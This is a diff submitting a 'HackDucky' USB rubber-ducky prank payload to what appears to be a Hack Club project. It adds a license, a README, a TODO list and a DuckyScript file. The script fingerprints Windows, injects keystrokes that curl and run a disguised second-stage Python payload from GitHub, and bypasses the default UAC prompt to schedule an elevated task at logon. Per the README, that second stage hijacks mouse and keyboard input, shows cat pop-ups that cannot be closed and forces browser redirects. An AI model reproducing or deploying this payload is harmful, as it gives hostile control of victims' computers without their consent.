Submission for Some1 (Slack ID U091HKKKJRH)

submissions/Cat Attack/LICENSE

@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2025 x-9917638
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.

submissions/Cat Attack/README.md

@@ -0,0 +1,35 @@
+# HackDucky
+
+The Hackclub themed USB rubber ducky ! - Check out [hackducky](https://hackclub.slack.com/archives/C08B8HZBC85)
+
+# What is this?
+
+HackDucky is Hackclub's own version of making a USB rubber ducky built by hackclubers. A usb rubber ducky is basically something that looks like a USB but is actually a trojan. It pretends to be a keyboard to the computer allowing you to basically take control of the computer you plug it into.
+<br><br>
+This is a payload written for a hackyducky consisting of:
+  1. Basic duckyscript for setting up the second stage of the payload.
+  2. An embedded python distribution with the Tkinter and pillow libraries installed.
+  3. A python script that does the real work.
+
+# How it works
+## Stage 1 - DuckyScript
+The victim plugs in the HackyDucky. If their OS is Windows, the script is executed.
+  - It downloads the second stage
+  - It downloads an embedded python distribution
+  - It creates an elevated command prompt, then schedules a task to be run at login
+
+## Stage 2 - Python Script
+This script is executed after the next logon.
+<br>
+There are 3 main features:
+  - Input manipulation - Random mouse clicks, random mouse movement, random caps lock, etc.
+  - Cat images - Gets an image from the [CATAAS](https://cataas.com/) api and displays it in an unclosable, unminimisable window
+  - Browser hijacking - Will randomly open an embarassing webpage (I don't have much of a list right now, give me some ideas)
+All these features run in seperate threads, and will randomly occur to disrupt the user
+
+# Licence
+MIT Licence
+
+# Disclaimer
+This was created for educational purposes only. 
+Please do not use this on a machine if you do not have permission to do so.

submissions/Cat Attack/TODO.md

@@ -0,0 +1,33 @@
+~~DUCKYSCRIPT~~ DONE!
+~~- Open cmd in the background~~
+~~- Curl python to temp appdata directory ~~
+~~- Install python quietly via cmdline~~
+  ~~- Args:~~
+    ~~- /quiet~~
+    ~~- TargetDir=%LocalAppData%\python1~~
+    ~~- AssociateFiles=0~~
+    ~~- CompileAll=1~~
+    ~~- Include_doc=0~~
+    ~~- Include_launcher=0~~
+    ~~- Include_tcltk=0~~
+    ~~- Include_test=0~~
+~~- Curl the main payload.py as an innocuous "py-manager.py" into python1 folder~~
+~~- Curl the autostart.bat as "explorer.bat" into autostart folder~~
+~~- Exit~~
+
+PYTHON
+- ~~Persistence: Copies itself into a few appdata directories~~ CANCELLED
+- Behaviour
+  ~~- Utilise input apis from windows to troll the user~~ DONE
+    ~~- Block input~~ WORKS
+    ~~- Change keyboard layout~~ No work :c
+    ~~- Send a few keystrokes~~ WORKS
+    ~~- Set double click threshold to crazy high so everything become doubleclick~~ WORKS 
+    ~~- Swap mouse buttons~~ WORKS
+    ~~- etc.etc.~~ Sense change, cursor trail 
+  ~~- Create annoying 'adware' (actually just cat image) popups~~ DONE & WORKING!
+  ~~- Redirects / forced rickrolls~~ DONE & WORKING!
+
+~~BATCH SCRIPT~~ CANCELED - Implemented persistence via task scheduler instead
+~~- Simply run the first instance of the python script it can find~~
+~~- Python script should handle replacing deleted copies already.~~

submissions/Cat Attack/entry.txt

@@ -0,0 +1,104 @@
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+
+REM Entry point for the python script
+REM Will open cmd
+REM Download python to temp directory 
+REM Install python quietly via cmdline
+REM Download and run the main payload
+
+
+
+REM Check OS
+IF (%_OS == WINDOWS) THEN
+    ATTACKMODE HID STORAGE
+ELSE 
+    REM Behave as an ordinary usb stick
+    ATTACKMODE STORAGE
+END_IF
+
+FUNCTION RUN()
+    GUI r
+    DELAY 500
+END_FUNCTION
+
+DEFAULT_DELAY 50
+
+
+RUN()
+REM Download python - also that's not an error idk why it doesn't work if path is closed quotes.
+STRINGLN curl -o "tmp.zip" "https://raw.githubusercontent.com/x-9917638/HackyDucky/refs/heads/main/python-embedded.zip" --create-dirs --output-dir "%localappdata%\Temp\py\
+
+REM Download main payload
+RUN()
+STRINGLN curl -q -s --output-dir "%localappdata%\python1" -o "python-manager.py" "https://raw.githubusercontent.com/x-9917638/HackyDucky/refs/heads/main/payload.py"
+DELAY 5000
+
+REM Unzip python
+RUN()
+STRINGLN cmd /c "cd %localappdata% && mkdir python1 > nul & tar -xf Temp\py\tmp.zip --cd python1"
+
+REM remove python download dir to avoid pollution
+RUN()
+STRINGLN rmdir /s /q "%localappdata%\Temp\py\"
+
+
+
+REM Open elevated cmd prompt - assumes default uac level
+GUI r
+DELAY 500
+STRING cmd
+CTRL SHIFT ENTER
+DELAY 300
+RIGHT
+ENTER
+
+REM Add task for startup run as admin
+STRINGLN schtasks /Create /TN "Python Maintenance" /TR "\"%localappdata%\python1\pythonw.exe\" \"%localappdata%\python1\python-manager.py\"" /SC ONLOGON /RL HIGHEST /F
+
+REM Payload will start working on next reboot.
+
+REM Close cmd.exe
+ALT F4
+
+REM Done!